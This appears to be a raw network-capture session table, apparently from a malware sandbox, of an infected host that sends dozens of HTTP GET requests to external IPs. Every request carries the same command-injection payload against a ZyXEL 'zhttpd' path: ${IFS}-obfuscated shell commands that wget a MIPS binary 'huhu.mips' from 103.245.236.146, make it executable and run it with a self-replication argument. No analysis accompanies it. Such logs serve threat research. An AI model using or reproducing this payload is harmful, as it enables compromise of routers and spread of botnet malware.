                                              Jan 29, 2024 07:03:38.791455984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1602192.168.2.14424305.18.149.164443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.791491032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1603192.168.2.143852288.26.242.28443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.791527033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1604192.168.2.1443880164.241.62.164443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.791578054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1605192.168.2.144591092.198.144.77443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.791616917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1606192.168.2.1457494184.254.43.166443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.791641951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1607192.168.2.144228882.121.143.8443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.791661024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1608192.168.2.145311242.62.50.88443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.791708946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1609192.168.2.145301091.156.38.158443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.791740894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1610192.168.2.1441804124.152.0.223443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.791794062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1611192.168.2.1438018158.82.120.25443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.791830063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1612192.168.2.145381650.199.44.67443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.791851044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1613192.168.2.144968237.194.233.157443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.791897058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1614192.168.2.143533246.177.86.252443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.791949987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1615192.168.2.14365969.81.163.94443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.791980028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1616192.168.2.1433100207.164.5.12443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.792016029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1617192.168.2.144745897.130.111.115443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.792041063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1618192.168.2.144533841.85.109.69443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.792074919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1619192.168.2.1456902137.160.222.114443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.792095900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1620192.168.2.1457216120.94.150.239443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.792119980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1621192.168.2.1457550108.168.42.103443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.792148113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1622192.168.2.144246092.48.64.3443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.792179108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1623192.168.2.144590673.228.156.123443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.792220116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1624192.168.2.145184063.97.118.9443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.792260885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1625192.168.2.1434210149.192.69.11443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.792293072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1626192.168.2.1446170111.158.233.135443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.792308092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1627192.168.2.145558242.118.105.104443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.792357922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1628192.168.2.14398281.73.49.253443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.792381048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1629192.168.2.1434158110.235.83.249443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.792438030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1630192.168.2.144938035.196.87.39443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.792470932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1631192.168.2.1460492157.44.213.95443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.792490005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1632192.168.2.1436876195.205.214.222443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.792524099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1633192.168.2.1442152112.186.186.163443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.792567015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1634192.168.2.1437002147.54.161.71443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.792599916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1635192.168.2.144028487.214.212.138443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.792644024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1636192.168.2.1459896163.253.168.97443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.792701960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1637192.168.2.1454336179.68.93.237443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.792722940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1638192.168.2.1433760156.239.27.93443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.792754889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1639192.168.2.1441878125.89.99.126443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.792809010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1640192.168.2.146011692.72.175.107443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.792834044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1641192.168.2.144110275.255.47.199443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.792857885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1642192.168.2.1439360136.41.117.199443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.792903900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1643192.168.2.1436698216.86.18.179443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.792927980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1644192.168.2.1443156159.161.122.173443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.792984009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1645192.168.2.145370092.8.191.118443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.793020964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1646192.168.2.1442390189.34.175.37443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.793056965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1647192.168.2.146066853.54.44.126443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.793090105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1648192.168.2.1447746172.183.56.89443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.793129921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1649192.168.2.145952699.15.23.248443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.793170929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1650192.168.2.1449952166.218.211.44443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.793203115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1651192.168.2.1443414202.216.241.23443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.793239117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1652192.168.2.145006454.198.5.46443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.793288946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1653192.168.2.1434006201.139.190.173443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.793348074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1654192.168.2.1440524174.94.55.36443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.793376923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1655192.168.2.1444066113.145.187.200443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.793416023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1656192.168.2.1456296146.222.238.221443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.793478012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1657192.168.2.146007873.159.78.77443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.793509007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1658192.168.2.1455066189.170.76.52443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.793535948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1659192.168.2.143993499.151.79.1443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.793569088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1660192.168.2.1433066222.85.232.97443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.793598890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1661192.168.2.143824097.147.135.87443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.793631077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1662192.168.2.146026463.182.29.114443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.793679953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1663192.168.2.1450252163.106.70.99443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.793711901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1664192.168.2.1457446116.76.174.99443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:38.793752909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1665192.168.2.1447524150.106.156.111443
                                              TimestampBytes transferredDirectionData
